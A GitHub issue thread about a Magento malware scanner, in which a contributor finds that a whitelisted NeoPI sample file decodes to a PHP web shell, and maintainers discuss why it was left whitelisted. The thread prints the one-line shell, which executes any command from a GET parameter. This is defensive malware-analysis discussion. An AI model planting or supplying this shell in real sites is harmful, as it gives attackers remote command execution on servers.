Whitelisted evil file

Question

Whitelisted evil file

jeroenvermeulen opened this issue 7 years ago · 4 comments

@gwillem While improving my deobfuscate script, I discovered you probably whitelisted an evil file in commit 4a4c7ff, PR #50:
https://github.com/gwillem/magento-malware-scanner/blob/master/corpus/whitelisted/NeoPI/animal_shell_poc.php
According to my deobfuscate script this file translates to:

<?php if(isset($_GET['cmd'])){ echo `{$_GET['cmd']}`; }

Which is nothing but evil, notice the backticks used in the echo.

Answer 1 · 2017-05-29T10:30:11.000Z

It was pragmatically whitelisted because many sites have NeoPI installed, which included this sample malware. But you're right, it is malware!

Answer 2 · 2017-05-29T11:48:36.000Z

I think you should not want to have this file in you Magento codebase. If you have it, you should remove it to protect yourself from potential abuse. Having this file installed is playing with fire.

Answer 3 · 2017-06-02T16:40:32.000Z

Have you seen it in the wild? It is indeed evil. However, on our platform there are some 50 legit cases (neopi installed outside webroot) and 0 wild occurrences. So to flag it as malware would cause lots of noise without (immediate) tangible benefit, at least here.

Answer 4 · 2017-06-02T19:06:35.000Z

No did not see it in the wild. Was just decoding all whitelisted files.
Let's close this issue.